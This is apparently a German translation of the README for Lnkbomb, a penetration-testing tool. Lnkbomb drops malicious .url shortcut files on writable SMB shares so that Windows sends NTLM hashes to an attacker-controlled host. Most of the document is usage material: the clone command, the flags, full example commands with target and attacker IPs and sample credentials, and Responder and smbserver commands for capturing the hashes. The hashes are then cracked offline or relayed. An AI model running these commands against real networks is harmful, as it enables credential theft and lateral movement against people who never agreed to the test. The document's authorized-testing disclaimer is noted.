
Bösartiger Verknüpfungsgenerator zum Sammeln von NTLM-Hashes aus unsicheren Dateifreigaben.
Lnkbomb wird verwendet, um bösartige Verknüpfungsdateien auf unsichere Dateifreigaben hochzuladen. Die Schwachstelle besteht darin, dass Windows nach einer Symboldatei sucht, die mit der Verknüpfungsdatei verknüpft werden soll. Diese Symboldatei kann auf den Rechner eines Penetrationstesters umgeleitet werden, auf dem Responder oder smbserver läuft, um NTLMv1- oder NTLMv2-Hashes zu sammeln (abhängig von der Konfiguration des Zielrechners). Der Tester kann dann versuchen, die gesammelten Hashes offline mit einem Tool wie Hashcat zu knacken oder sie an ein Tool wie ntlmrelayx zur weiteren Ausnutzung weiterzuleiten.
Die Nutzlastdatei wird direkt auf die unsichere Datei hochgeladen, die vom Tester in der Befehlszeile angegeben wird. Der Tester gibt auch seine IP-Adresse an, die in die Nutzlast geschrieben wird.
Version 2.0 ist ein kompletter Neubau des Tools und verwendet die pysmb-Bibliothek, die unauthentifizierte und authentifizierte Nutzlastablegungen ermöglicht.
Lnkbomb installieren
Beachten Sie, dass das Projekt unter Windows konsistent funktioniert. Unter Linux kann es zu Problemen kommen.
git clone https://github.com/dievus/lnkbomb.git
Wechseln Sie in das Verzeichnis lnkbomb und führen Sie aus:
python3 lnkbomb.py -h
Dies gibt das Hilfemenü aus, das die folgenden Flags enthält:
-h, --help - Listet die Hilfeoptionen auf
-t, --target - Gibt die IP-Adresse des Ziels an
-a, --attacker - Gibt die IP-Adresse des Angriffsrechners des Testers an
-r, --recover - Wird verwendet, um die Nutzlast zu entfernen, wenn der Test abgeschlossen ist (z.B. -r payloadname.url)
-w, --windows - Neuer Befehl - erforderlich zum Festlegen der entsprechenden Ports für Windows-Freigaben
-l, --linux - Neuer Befehl - erforderlich zum Festlegen der entsprechenden Ports für Linux-Freigaben
-n, --netbios - Neuer Befehl - NetBIOS-Name für die Ziel-Windows-Rechner muss angegeben werden
Beispiele für vollständige Befehle sind:
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url
Sie müssen ein Tool wie Responder oder smbserver verwenden, um den NTLM-Hash zu erfassen.
responder -I eth0 -dwFP -v
oder
smbserver.py . . -smb2support
Bitte beachten Sie, dass dieses Tool nur für ethisches Hacking und Penetrationstests gedacht ist. Ich billige kein Verhalten, das das Testen von Zielen beinhaltet, für die Sie derzeit keine Testberechtigung haben.
Dieses Tool kann je nach Patch- und Versionsstand des Ziels funktionieren oder auch nicht. Die Benutzererfahrung kann variieren.
Ich weiß, dass es .url-Verknüpfungen und nicht .lnk-Erweiterungen sind. Ich mache es, um Sie zu triggern.